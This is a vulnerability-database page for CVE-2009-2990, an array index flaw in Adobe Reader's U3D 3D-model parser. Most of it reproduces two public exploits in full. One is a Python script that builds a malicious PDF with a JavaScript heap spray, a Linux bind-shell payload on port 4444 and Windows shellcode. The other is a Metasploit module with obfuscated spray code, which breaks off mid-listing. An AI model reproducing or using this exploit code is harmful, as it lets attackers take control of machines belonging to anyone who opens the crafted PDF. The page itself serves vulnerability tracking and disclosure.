CVE-2009-2990 : Detail

CVE-2009-2990

97.3%V3
Network
2009-10-19
20h00 +00:00
2017-09-18
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Array index error in Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x through 7.1.4 might allow attackers to execute arbitrary code via unspecified vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 9990

Publication date : 2009-11-08 23h00 +00:00
Author : Felipe Andres Manzano
EDB Verified : Yes

######################################################################### #### Felipe Andres Manzano * felipe.andres.manzano@gmail.com #### #### http://twitter/feliam #### ######################################################################### __doc__=''' Title: U3D CLODProgressiveMeshContinuation Split Position Index arbitrary dereference. Product: Adobe Acrobat Reader Version: <=8.1.6, <=9.1.3 Product Homepage: www.adobe.com CVE: 2009-2990 OSs: WinXPSPx/Linux Vulnerability Description ----------------------------------------- Universal 3D (U3D) is a compressed file format standard for 3D computer graphics data. When a U3D CLODProgressiveMeshContinuation (blocktype: 0xFFFFFF3C) is parsed by Adobe acrobat reader U3D plugin the split position index is readed from the input without any validation. That index is then used for getting an object out of the limits of the array, object from wich a function pointer is dereferenced and called. From the u3d specification: ## 9.6.1.3.4.1 U32 [rCurrentPositionCount]: Split Position Index # Split Position Index is the index of the position to be split by this # Resolution Update. Exploiting: In acrobat using a well known js heap spray an attacker could control the contents of the dereferenced object and execute arbitrary code. Note that, at least for XP there is NO strict need to do the spray with JS/Flash. An multiexploit for {Adobe Acrobat Reader/Multilingual}x{7.x, 8.x, 9.x}x{XPSP2, XPSP3, Linux} is provided as a .. PoC. REFERENCES ========== http://www.adobe.com/support/security/bulletins/apsb09-15.html http://en.wikipedia.org/wiki/Universal_3D http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-363%204th%20edition.pdf http://www.adobe.com/devnet/acrobat3d/pdfs/U3DElements.pdf http://www.ucon-conference.org/materials/2009/HackingPDFReaders-uCon-2009.pdf Vulnerability WorkAround (if possible) ----------------------------------------- PATCH AVAILABLE! ''' import os import zlib import sys import struct #For constructing a minimal pdf file class PDFObject: def __init__(self): self.n=None self.v=None def __str__(self): raise "Fail" class PDFStream(PDFObject): def __init__(self, dict,stream): PDFObject.__init__(self) dict.add('Length', len(stream)) self.dict=dict self.stream=stream def __str__(self): s="" s+=self.dict.__str__() s+="\nstream\n" s+=self.stream s+="\nendstream" return s class PDFArray(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "[%s]"%(" ".join([ o.__str__() for o in self.s])) class PDFDict(PDFObject): def __init__(self): PDFObject.__init__(self) self.dict = [] def add(self,name,obj): self.dict.append((name,obj)) def __str__(self): s="<<" for name,obj in self.dict: s+="/%s %s "%(name,obj) s+=">>" return s class PDFName(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "/%s"%self.s class PDFString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "(%s)"%self.s class PDFHexString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "<" + "".join(["%02x"%ord(c) for c in self.s]) + ">" class PDFOctalString(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s="".join(["\\%03o"%ord(c) for c in s]) def __str__(self): return "(%s)"%self.s class PDFNum(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): return "%s"%self.s class PDFBool(PDFObject): def __init__(self,s): PDFObject.__init__(self) self.s=s def __str__(self): if self.s: return "true" return "false" class PDFRef(PDFObject): def __init__(self,obj): PDFObject.__init__(self) self.obj=[obj] def __str__(self): return "%d %d R"%(self.obj[0].n,self.obj[0].v) class PDFNull(PDFObject): def __init__(self): PDFObject.__init__(self) def __str__(self): return "null" class PDFDoc(): def __init__(self): self.objs=[] def setRoot(self,root): self.root=root def _add(self,obj): obj.v=0 obj.n=1+len(self.objs) self.objs.append(obj) def add(self,obj): if type(obj) != type([]): self._add(obj); else: for o in obj: self._add(o) def _header(self): return "%PDF-1.7\n" def __str__(self): doc1 = self._header() xref = {} for obj in self.objs: xref[obj.n] = len(doc1) doc1+="%d %d obj\n"%(obj.n,obj.v) doc1+=obj.__str__() doc1+="\nendobj\n" posxref=len(doc1) doc1+="xref\n" doc1+="0 %d\n"%(len(self.objs)+1) doc1+="0000000000 65535 f\n" for xr in xref.keys(): doc1+= "%010d %05d n\n"%(xref[xr],0) doc1+="trailer\n" trailer = PDFDict() trailer.add("Size",len(self.objs)+1) trailer.add("Root",PDFRef(self.root)) doc1+=trailer.__str__() doc1+="\nstartxref\n%d\n"%posxref doc1+="%%EOF\n\n" return doc1 ##Main ## linux_ia32_bind - LPORT=4444 Size=84 Encoder=None http://metasploit.com linScode = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" linScode += "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" linScode += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" linScode += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" linScode += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" linScode += "\x89\xe1\xcd\x80" # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com w32Scode = "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88" w32Scode += "\x06\x28\x26\x83\xeb\xfc\xe2\xf4\x74\xee\x6c\x26\x88\x06\xa3\x63" w32Scode += "\xb4\x8d\x54\x23\xf0\x07\xc7\xad\xc7\x1e\xa3\x79\xa8\x07\xc3\x6f" w32Scode += "\x03\x32\xa3\x27\x66\x37\xe8\xbf\x24\x82\xe8\x52\x8f\xc7\xe2\x2b" w32Scode += "\x89\xc4\xc3\xd2\xb3\x52\x0c\x22\xfd\xe3\xa3\x79\xac\x07\xc3\x40" w32Scode += "\x03\x0a\x63\xad\xd7\x1a\x29\xcd\x03\x1a\xa3\x27\x63\x8f\x74\x02" w32Scode += "\x8c\xc5\x19\xe6\xec\x8d\x68\x16\x0d\xc6\x50\x2a\x03\x46\x24\xad" w32Scode += "\xf8\x1a\x85\xad\xe0\x0e\xc3\x2f\x03\x86\x98\x26\x88\x06\xa3\x4e" w32Scode += "\xb4\x59\x19\xd0\xe8\x50\xa1\xde\x0b\xc6\x53\x76\xe0\x78\xf0\xc4" w32Scode += "\xfb\x6e\xb0\xd8\x02\x08\x7f\xd9\x6f\x65\x49\x4a\xeb\x28\x4d\x5e" w32Scode += "\xed\x06\x28\x26" #Trap shellcode dbgScode = "\xcc"*10 class PDFU3DExploit: def _toJS(self, s): if len(s) % 2 != 0: raise "Err! Should be even number of chars" r = "" for i in range (0,len(s)/2): r += "%u"+ "".join([ "%02x%02x"%(ord(s[i*2+1]),ord(s[i*2]))]) return r def _getU3DStream(self, index): stream = "\x53\x6f\x72\x72\x79\x2c\x20\x6b\x69\x6c\x6c\x69\x6e\x67\x20\x73" stream += "\x6f\x6d\x65\x20\x73\x6b\x69\x64\x64\x69\x65\x73\x2e\x20\x20\x20" stream += "\x55\x33\x44\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" stream += "\x00\x00\x00\x00\x24\x00\x00\x00\x80\xb6\x02\x00\x00\x00\x00\x00" stream += "\x6a\x00\x00\x00\x14\xff\xff\xff\xa0\x00\x00\x00\x00\x00\x00\x00" stream += "\x0b\x00\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x45\x01\x00\x00" stream += "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x31\xff\xff\xff" stream += "\x75\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x45\x45\x45\x45\x45\x45" stream += "\x45\x45\x45\x45\x45\x00\x00\x00\x00\x00\x00\x00\x00\x22\xc3\x00" stream += "\x00\x26\x62\x00\x00\x66\x49\x02\x00\x00\x00\x00\x00\x00\x00\x00" stream += "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" stream += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\x62\x00\x00\x2c\x01\x00" stream += "\x00\x2c\x01\x00\x00\x2c\x01\x00\x00\x6c\x1e\x0b\x3f\xa6\x05\x6f" stream += "\x3b\xa6\x05\x6f\x3b\x4a\xf5\x2d\x3c\x4a\xf5\x2d\x3c\x66\x66\x66" stream += "\x3f\x00\x00\x00\x3f\xf6\x28\x7c\x3f\x00\x00\x00\x00\x00\x00\x00" stream += "\x3c\xff\xff\xff\xf6\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x45\x45" stream += "\x45\x45\x45\x45\x45\x45\x45\x45\x45\x00\x00\x00\x00\x00\x00\x00" stream += "\x00\x00\x10\x00\x00" stream += struct.pack("<L",index) stream += "\x00\x00\x00\x00\x00\x00\x00" stream += "\x00\x00\x00\x07\x9c\x00\x00\x00\x37\x0c\x00\x00\xd0\x02\x00\x00" stream += "\x3f\xeb\x95\x0d\x00\x00\x76\x05\x00\x00\xea\x15\x00\x00\xe2\x02" stream += "\x00\x00\x00\x00\x00\x00\x80\x82\x22\x8e\x2f\xaa\x00\x00\x00\xc2" stream += "\x13\x23\x00\x20\xbb\x06\x00\x80\xc2\x1f\x00\x80\x20\x00\x00\x00" stream += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xc0\x14\x01" stream += "\x00\x20\x44\x0a\x00\x10\x7e\x4b\x8d\xf8\x7c\x32\x6d\x03\x00\x00" stream += "\xb2\x0b\x00\x20\xfd\x19\x00\x20\xb6\xe9\xea\x2e\x55\x00\x00\x59" stream += "\x94\x00\x00\x4c\x00\x01\x00\x1a\xbb\xa0\xc8\xc1\x04\x00\x70\xc4" stream += "\xa0\x00\x00\x00\x6c\x98\x46\xac\x04\x00\x60\xf6\x1c\x00\x20\xa1" stream += "\x0f\x00\xa0\x17\x66\x23\x00\x00\xde\x88\x1d\x00\x00\x7b\x16\x9f" stream += "\x72\x9a\x1d\x15\x00\x80\xeb\x39\x00\x00\x00\x00\x00\x00\x94\xc8" stream += "\x00\x00\x54\xce\xfb\x32\x00\x80\xc4\x3e\xb0\xc4\x88\xde\x77\x00" stream += "\x00\x46\x72\x01\x00\xf0\x56\x01\x00\x8c\x53\xe9\x10\x9d\x6b\x06" stream += "\x00\x50\xa2\x00" #laziest hack ever! Another index must be found for using the following # stream in windows.. and a lot of tests shoul be done. if (index == 0x01d10000): return stream stream = "\x53\x6f\x72\x72\x79\x2c\x20\x6b\x69\x6c\x6c\x69\x6e\x67\x20\x73" stream += "\x6f\x6d\x65\x20\x73\x6b\x69\x64\x64\x69\x65\x73\x2e\x20\x20\x20" stream += "\x55\x33\x44\x00\x18\x00\x00\x00\x16\x04\x00\x00\x00\x01\x00\x00" stream += "\x00\x00\x00\x00\x24\x00\x00\x00\x74\x01\x00\x00\x00\x00\x00\x00" stream += "\x6a\x00\x00\x00\x01\x00\x00\x00\x08\x00\x61\x6c\x61\x6c\x61\x6c" stream += "\x61\x30\x01\x00\x00\x00\x00\x04\x00\x00" stream += "\xa8"*1024 stream += "\x50\x50\x14\xff\xff\xff" stream += "\xa0\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x41\x41\x41\x41\x41\x41" stream += "\x41\x41\x41\x41\x41\x01\x00\x00\x00\x00\x00\x00\x00\x50\x50\x50" stream += "\x01\x00\x00\x00\x31\xff\xff\xff\x75\x00\x00\x00\x00\x00\x00\x00" stream += "\x0b\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00" stream += "\x00\x00\x00\x00\x00\x22\xc3\x00\x00\x26\x66\x00\x00\x04\x00\x00" stream += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" stream += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00\x00" stream += "\x00\x65\x00\x00\x00\x2c\x01\x00\x00\x2c\x01\x00\x00\x2c\x01\x00" stream += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" stream += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" stream += "\x00\x00\x00\x00\x00\x50\x50\x50\x3c\xff\xff\xff\x95\x00\x00\x00" stream += "\x00\x00\x00\x00\x0b\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" stream += "\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00" stream += struct.pack("<L",index) #\x3c\xfe\xff" stream += "\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00" stream += "\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00" stream += "\x00\x01\x00\x00\x00\x01\x00\x00\x00\x46\x65\x6c\x69\x46\x65\x6c" stream += "\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c" stream += "\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c" stream += "\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c" stream += "\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x46\x65\x6c" stream += "\x69\x46\x65\x6c\x69\x46\x65\x6c\x69\x50\x50\x50" return stream def _getU3DAnnotation(self, u3d): str3d = PDFDict() str3d.add("Type","/3D") str3d.add("Subtype","/U3D") str3d = PDFStream(str3d,u3d) self.doc.add(str3d) annot3d = PDFDict() annot3d.add("Type",PDFName("Annot")) annot3d.add("Subtype","/3D") annot3d.add("Contents", "(a pwning u3d model)") annot3d.add("3DI", "false") annot3d.add("3DA", "<< /A /PO /DIS /I >>") annot3d.add('Rect', PDFArray([ 0, 0, 640, 480])) annot3d.add("3DD", PDFRef(str3d)) annot3d.add("F", "7") self.doc.add(annot3d) return PDFRef(annot3d) def __init__(self,w32scode,linscode): self.doc= PDFDoc() self.w32Scode = w32scode self.linScode = linscode javascript = PDFDict() javascript.add("S", PDFName("JavaScript")) javascript.add("JS", PDFHexString(''' var jmp = unescape("%u9090%u7f3e"); var nop = unescape("%u9090%u9090"); function mkSlice(str,size,rest){ while (str.length <= size/2) str += str; str = str.substring(0, size/2 -32/2 -4/2 - rest -2/2); return str; }; function spray(escA,escB,escC,escShellcode){ var i; var pointersA = unescape(escA); var pointersB = unescape(escB); var pointersC = unescape(escC); var shellcode = unescape(escShellcode); pointersA_slide=mkSlice(pointersA,0x100000, pointersA.length); pointersB_slide=mkSlice(pointersB,0x100000, pointersB.length); pointersC_slide=mkSlice(pointersC,0x100000, pointersC.length); nop_slide = mkSlice(nop,0x100000, shellcode.length); var x = new Array(); for (i = 0; i < 400; i++) { if(i<100) x[i] = pointersA_slide+pointersA; else if(i<200) x[i] = pointersB_slide+pointersB; else if(i<300) x[i] = pointersC_slide+pointersC; else x[i] = nop_slide+shellcode; } return x; }; var mem; if (app.platform == "WIN"){ mem = spray("%u0f0f%u0f0f","%u1616%u1616","%u1c1c%u1c1c","'''+self._toJS(self.w32Scode)+'''") this.pageNum = 2; }else if (app.platform =="MAC"){ this.pageNum = 0; //not exploitable }else{ mem = spray("%u5979%u7975","%ua2a2%ua2a2","%u9c9c%u9c9c","'''+self._toJS(self.linScode)+'''"); this.pageNum = 1; } //feli ''')) self.doc.add(javascript) branding = PDFDict() branding.add("Author", PDFString("Felipe Andres Manzano")) branding.add("email", PDFString("felipe.andres.manzano@gmail.com")) branding.add("web", PDFString("felipe.andres.manzano.googlepages.com")) self.doc.add(branding) #outline outlines = PDFDict() outlines.add("Type", PDFName("Outlines")) outlines.add("Count",0) #pages pages = PDFDict() pages.add("Type", PDFName("Pages")) #catalog catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Outlines", PDFRef(outlines)) catalog.add("Pages", PDFRef(pages)) catalog.add("OpenAction", PDFRef(javascript)) #lets add those to doc just for showing up the Ref object. self.doc.add([catalog,outlines,pages]) #Set the pdf root self.doc.setRoot(catalog) contents = PDFStream(PDFDict(), '(Aaaaa) Tj' ) resources = PDFDict() resources.add('ProcSet', PDFArray([PDFName('PDF')])) self.doc.add([contents, resources]) #The pdf pages linuxPage = PDFDict() linuxPage.add('Type', PDFName('Page')) linuxPage.add('Parent', PDFRef(pages)) linuxPage.add('MediaBox', PDFArray([ 0, 0, 640, 480])) linuxPage.add('Contents', PDFRef(contents)) linuxPage.add('Resources', PDFRef(resources)) #2.6.24linuxPage.add('Annots', PDFArray([self._getU3DAnnotation(self._getU3DStream(0xb0000))])) #2.6.27linuxPage.add('Annots', PDFArray([self._getU3DAnnotation(self._getU3DStream(0xbd0000))])) #linuxPage.add('Annots', PDFArray([self._getU3DAnnotation(self._getU3DStream(0xffffff9f))])) linuxPage.add('Annots', PDFArray([self._getU3DAnnotation(self._getU3DStream(0xfffffe3c))])) self.doc.add(linuxPage) windowsPage = PDFDict() windowsPage.add('Type', '/Page') windowsPage.add('Parent', PDFRef(pages)) windowsPage.add('MediaBox', PDFArray([ 0, 0, 640, 480])) windowsPage.add('Contents', PDFRef(contents)) windowsPage.add('Resources', PDFRef(resources)) windowsPage.add('Annots', PDFArray([self._getU3DAnnotation(self._getU3DStream(0x01d10000))])) self.doc.add(windowsPage) pageDummy = PDFDict() pageDummy.add('Type', '/Page') pageDummy.add('Parent', PDFRef(pages)) pageDummy.add('MediaBox', PDFArray([ 0, 0, 640, 480])) pageDummy.add('Contents', PDFRef(contents)) pageDummy.add('Resources', PDFRef(resources)) self.doc.add(pageDummy) pages.add('Count', PDFNum(3)) pages.add('Kids',PDFArray([PDFRef(pageDummy),PDFRef(linuxPage),PDFRef(windowsPage)])) def render(self): #render it return self.doc.__str__() ##Main if __name__=="__main__": if len(sys.argv) != 2: print __doc__ print "For metasploit integration check out:\n\t http://sites.google.com/site/felipeandresmanzano/python_pdf_wrapper.rb" print "Usage:\n\t%s %s"%(sys.argv[0],"shellcode".encode('hex')) sys.exit() u3dpdf = PDFU3DExploit(sys.argv[1].decode('hex'),linScode) print u3dpdf.render()
Exploit Database EDB-ID : 16309

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: adobe_u3d_meshcont.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun', 'Description' => %q{ This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Felipe Andres Manzano <felipe.andres.manzano[at]gmail.com>', 'jduck' ], 'Version' => '$Revision: 10394 $', 'References' => [ [ 'CVE', '2009-2990' ], [ 'OSVDB', '58920' ], [ 'BID', '36665' ], [ 'URL', 'http://sites.google.com/site/felipeandresmanzano/' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-15.html' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'DisableNops' => true }, 'Targets' => [ # test results (on Windows XP SP3) # reader 7.0.5 - untested # reader 7.0.8 - untested # reader 7.0.9 - untested # reader 7.1.0 - untested # reader 7.1.1 - untested # reader 8.0.0 - untested # reader 8.1.2 - works # reader 8.1.3 - works # reader 8.1.4 - untested # reader 8.1.5 - untested # reader 8.1.6 - untested # reader 9.0.0 - untested # reader 9.1.0 - works [ 'Adobe Reader Windows Universal (JS Heap Spray)', { 'Index' => 0x01d10000, 'Platform' => 'win', 'Arch' => ARCH_X86, 'escA' => 0x0f0f0f0f, 'escB' => 0x16161616, 'escC' => 0x1c1c1c1c } ], # untested [ 'Adobe Reader Linux Universal (JS Heap Spray)', { 'Index' => 0xfffffe3c, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'escA' => 0x75797959, 'escB' => 0xa2a2a2a2, 'escC' => 0x9c9c9c9c } ] ], 'DisclosureDate' => 'Oct 13 2009', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end def exploit # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Make some nops nops = Rex::Text.to_unescape(make_nops(4)) # prepare the pointers! ptrA = Rex::Text.to_unescape([target['escA']].pack('V'), Rex::Arch.endian(target.arch)) ptrB = Rex::Text.to_unescape([target['escB']].pack('V'), Rex::Arch.endian(target.arch)) ptrC = Rex::Text.to_unescape([target['escC']].pack('V'), Rex::Arch.endian(target.arch)) script = <<-EOF var nopz = unescape("#{nops}"); function mkSlice(stringy,size,rest){ while (stringy.length <= size/2) stringy += stringy; stringy = stringy.substring(0, size/2 -32/2 -4/2 - rest -2/2); return stringy; }; function spray(escA,escB,escC,escShellcode){ var loop1; var pointersA = unescape(escA); var pointersB = unescape(escB); var pointersC = unescape(escC); var shellcode = unescape(escShellcode); pointersA_slide=mkSlice(pointersA,0x100000, pointersA.length); pointersB_slide=mkSlice(pointersB,0x100000, pointersB.length); pointersC_slide=mkSlice(pointersC,0x100000, pointersC.length); nop_slide = mkSlice(nopz,0x100000, shellcode.length); var xarr = new Array(); for (loop1 = 0; loop1 < 400; loop1++) { if(loop1<100) xarr[loop1] = pointersA_slide+pointersA; else if(loop1<200) xarr[loop1] = pointersB_slide+pointersB; else if(loop1<300) xarr[loop1] = pointersC_slide+pointersC; else xarr[loop1] = nop_slide+shellcode; } return xarr; }; var memoryz = spray("#{ptrA}","#{ptrB}","#{ptrC}","#{shellcode}"); this.pageNum = 1; EOF # Obfuscate it up a bit script = obfuscate_js(script, 'Symbols' => { 'Variables' => %W{ pointersA_slide pointersA escA pointersB_slide pointersB escB pointersC_slide pointersC escC escShellcode nop_slide shellcode stringy size rest nopz loop1 xarr memoryz }, 'Methods' => %W{ mkSlice spray } }).to_s # create the u3d stuff u3d = make_u3d_stream(target['Index'], "E" * 11) # Create the pdf pdf = make_pdf(script, u3d) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end def obfuscate_js(javascript, opts) js = Rex::Exploitation::ObfuscateJS.new(javascript, opts) js.obfuscate return js end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj\n" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def u3d_pad(str, char="\x00") ret = "" if (str.length % 4) > 0 ret << char * (4 - (str.length % 4)) end return ret end def make_u3d_stream(index, meshname) # build the U3D header (length will be patched in later) hdr_data = [1,0].pack('n*') # version info hdr_data << [0,0x24,31337,0,0x6a].pack('VVVVV') hdr = "U3D\x00" hdr << [hdr_data.length,0].pack('VV') hdr << hdr_data # mesh declaration decl_data = [meshname.length].pack('v') decl_data << meshname decl_data << [0].pack('V') # chain idx # max mesh desc decl_data << [0].pack('V') # mesh attrs decl_data << [0xc322].pack('V') # face count decl_data << [0x6226].pack('V') # position count decl_data << [0x24966].pack('V') # normal count decl_data << [0].pack('V') # diffuse color count decl_data << [0].pack('V') # specular color count decl_data << [0].pack('V') # texture coord count decl_data << [1].pack('V') # shading count # shading desc decl_data << [0].pack('V') # shading attr decl_data << [1].pack('V') # texture layer count decl_data << [0].pack('V') # texture coord dimensions decl_data << [0].pack('V') # original shading id # minimum resolution decl_data << [0x6226].pack('V') # final maximum resolution (needs to be bigger than the minimum) # quality factors decl_data << [0x12c].pack('V') # position quality factor decl_data << [0x12c].pack('V') # normal quality factor decl_data << [0x12c].pack('V') # texture coord quality factor # inverse quantiziation decl_data << [0x3f0b1e6c].pack('V') # position inverse quant decl_data << [0x3b6f05a6].pack('V') # normal inverse quant decl_data << [0x3b6f05a6].pack('V') # texture coord inverse quant decl_data << [0x3c2df54a].pack('V') # diffuse color inverse quant decl_data << [0x3c2df54a].pack('V') # specular color inverse quant # resource params decl_data << [0x3f666666].pack('V') # normal crease param decl_data << [0x3f000000].pack('V') # normal update param decl_data << [0x3f7c28f6].pack('V') # normal tolerance param # skeleton description decl_data << [0].pack('V') # bone count # padding mesh_decl = [0xffffff31,decl_data.length,0].pack('VVV') mesh_decl << decl_data mesh_decl << u3d_pad(decl_data) # build the modifier chain chain_data = [meshname.length].pack('v') chain_data << meshname chain_data << [1].pack('V') # type (model resource) chain_data << [0].pack('V') # attributes (no bounding info) chain_data << u3d_pad(chain_data) chain_data << [1].pack('V') # number of modifiers chain_data << mesh_decl modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV') modifier_chain << chain_data # mesh continuation cont_data = [meshname.length].pack('v') cont_data << meshname cont_data << [0].pack('V') # chain idx cont_data << [0].pack('V') # start resolution cont_data << [0x1000].pack('V') # end resolution # 4096 continuation blocks cont_data << [index].pack('V') # split position index cont_data << [0].pack('v') # new diffuse color count cont_data << [0].pack('v') # new specular color count cont_data << [0].pack('v') # new text coord count cont_data << [0].pack('V') # new face count # unknown data cont_data << "\x07\x9c\x00\x00\x00\x37\x0c\x00\x00\xd0\x02\x00\x00\x3f\xeb\x95\x0d\x00\x00\x76" cont_data << "\x05\x00\x00\xea\x15\x00\x00\xe2\x02\x00\x00\x00\x00\x00\x00\x80\x82\x22\x8e\x2f" cont_data << "\xaa\x00\x00\x00\xc2\x13\x23\x00\x20\xbb\x06\x00\x80\xc2\x1f\x00\x80\x20\x00\x00" cont_data << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xc0\x14\x01\x00\x20\x44" cont_data << "\x0a\x00\x10\x7e\x4b\x8d\xf8\x7c\x32\x6d\x03\x00\x00\xb2\x0b\x00\x20\xfd\x19\x00" cont_data << "\x20\xb6\xe9\xea\x2e\x55\x00\x00\x59\x94\x00\x00\x4c\x00\x01\x00\x1a\xbb\xa0\xc8" cont_data << "\xc1\x04\x00\x70\xc4\xa0\x00\x00\x00\x6c\x98\x46\xac\x04\x00\x60\xf6\x1c\x00\x20" cont_data << "\xa1\x0f\x00\xa0\x17\x66\x23\x00\x00\xde\x88\x1d\x00\x00\x7b\x16\x9f\x72\x9a\x1d" cont_data << "\x15\x00\x80\xeb\x39\x00\x00\x00\x00\x00\x00\x94\xc8\x00\x00\x54\xce\xfb\x32\x00" cont_data << "\x80\xc4\x3e\xb0\xc4\x88\xde\x77\x00\x00\x46\x72\x01\x00\xf0\x56\x01\x00\x8c\x53" cont_data << "\xe9\x10\x9d\x6b\x06\x00" cont_data << "\x50" # pad mesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV') mesh_cont << cont_data #mesh_cont << u3d_pad(cont_data) mesh_cont << "\xa2\x00" # manual padding data = hdr data << modifier_chain data << mesh_cont # patch the length data[24,4] = [0x2b680].pack('V') # hardcode the data length if index == 0x01d10000 #laziest hack ever! Another index must be found for using the following # stream in windows.. and a lot of tests shoul be done. return data end # linux version # build the U3D header (length will be patched in later) hdr_data = [1,0].pack('n*') # version info hdr_data << [0,0x24,31337,0,0x6a].pack('VVVVV') meta_str1 = "alalala0" meta_str2 = "\xa8" * 1024 hdr_meta = [1].pack('V') hdr_meta << [meta_str1.length].pack('v') hdr_meta << meta_str1 hdr_meta << [1].pack('V') hdr_meta << [meta_str2.length].pack('V') hdr_meta << meta_str2 hdr = "U3D\x00" hdr << [hdr_data.length,hdr_meta.length].pack('VV') hdr << hdr_data hdr << hdr_meta hdr << u3d_pad(hdr_meta) # mesh declaration decl_data = [meshname.length].pack('v') decl_data << meshname decl_data << [0].pack('V') # chain idx # max mesh desc decl_data << [0].pack('V') # mesh attrs decl_data << [0xc322].pack('V') # face count decl_data << [0x6626].pack('V') # position count decl_data << [4].pack('V') # normal count decl_data << [0].pack('V') # diffuse color count decl_data << [0].pack('V') # specular color count decl_data << [0].pack('V') # texture coord count decl_data << [1].pack('V') # shading count # shading desc decl_data << [0].pack('V') # shading attr decl_data << [0].pack('V') # texture layer count decl_data << [0].pack('V') # original shading id # no texture coord dimensions decl_data << [0x64].pack('V') # 